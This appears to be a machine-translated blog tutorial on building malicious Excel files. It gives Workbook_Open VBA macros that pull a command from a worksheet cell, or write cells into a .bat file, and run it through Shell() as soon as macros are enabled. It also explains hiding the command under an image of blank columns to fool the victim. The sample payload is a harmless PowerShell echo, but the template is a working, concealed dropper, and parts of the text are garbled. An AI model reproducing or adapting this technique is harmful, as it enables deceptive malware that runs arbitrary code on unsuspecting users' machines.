Social Engineering using Hidden Macros in Excel

With the following method, we will do an analysis of a malicious document that contains a macro, which is slightly more difficult than an .exe analysis, but not impossible.

NOTE: Η απλή εκτέλεση ενός εργαλείου όπως το oledump ή το olevba θα επιστρέψει στο έγγραφο τις μακρο.

All it will show is that the macro extracts code from a specific column and executes it using Shell (), which is shown below to be suspicious:

And if we navigate to BG1 where the code appears, we do not immediately see anything suspicious:

But if you hover your mouse over the BG1 (or just look a little closer and notice the columns that are not aligned), then you will see that there is an image that overlaps the code:


Obviously someone with a little more patience could refine the screenshot of the blank columns and overlay it over the code to make it less noticeable.

Another way to reveal the code extracted from the .excel worksheet is by using MsgBox :

Creating the document

What's needed:

  1. Screenshot of a set of blank columns to overlay over code, for example
  2. Macros that extract code from the workbook and execute data:
Private Sub Workbook_Open () Data = Sheet1.Range ("BG1") Shell (Data) End Sub
  • Data = Sheet1.Range (“BG1”) Just look at the row in BG1, extract everything in the row and place it inside the variable  Data
  1. Code that will be exported and executed when the document is opened and the user clicks on "Enable Content"
powershell.exe -exec bypass -C echo "Hello world"> C: \ Users \ Desktop \ Conduct \ Desktop \ test.txt

After entering the code in any column you want, simply insert the image of the blank columns above the code (Insert> Illustrations> Images)

Then import the macros into ThisWorkbook and change the section  Range()  to match your column. If you entered the data in column A and it is in the 1st row, it would be  range (“A1”)

Compose multiple lines in a file

Writing multiple lines in a file is a simple piece and only requires adding a few lines of code.

The macro code used is here:

Private Sub Workbook_Open ()

1. Dim Path As String

2. Dim FileNumber As Integer

3. FileNumber = FreeFile

4. Data = Sheet1.Range (“BG1”)

5. Data2 = Sheet1.Range (“BG2”)

6. Path = “test.bat”

7. Open Path For Output As FileNumber

8. Print #FileNumber, Data

9. Print #FileNumber, Data2

10. Close FileNumber 11. Shell (Path) End Sub

  • Lines 1-3 are static, keep them as they are. They just define the variables used
  • Lines 4-6 are dynamic. You will need to change the strings to 4 & 5 so that it is where your code is in excel worksheet terms. Change line 6 to the file path you want.
  • Lines 7-9 are also dynamic, just open the file and write the extracted data to the file. Lines 8 & 9 in particular are the lines that are responsible for compiling the data in the file.

Just enter the code you want to write to a file, note the column and row in which it is located, and change the Data & Data1 variable to fit your column and row (add more variables if needed).

Then overlay the code with the blank line screenshot and you're done! The Best Technology Site in Greecefgns

Subscribe to Blog by Email

Subscribe to this blog and receive notifications of new by email.

Written by Anastasis Vasileiadis

Translations are like women. When they are beautiful they are not faithful and when they are faithful they are not beautiful.

Leave a reply

Your email address is not published. Required fields are mentioned with *

Your message will not be published if:
1. Contains insulting, defamatory, racist, offensive or inappropriate comments.
2. Causes harm to minors.
3. It interferes with the privacy and individual and social rights of other users.
4. Advertises products or services or websites.
5. Contains personal information (address, phone, etc.).